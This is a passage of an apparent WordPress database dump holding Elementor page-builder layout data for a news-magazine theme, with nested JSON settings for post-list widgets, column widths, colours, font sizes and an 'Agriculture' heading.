blet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"category\":[\"2\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1207,439,'_elementor_version','0.4'),(1208,439,'_elementor_css','a:3:{s:4:\"time\";i:1508883166;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1210,440,'_elementor_edit_mode','builder'),(1211,440,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{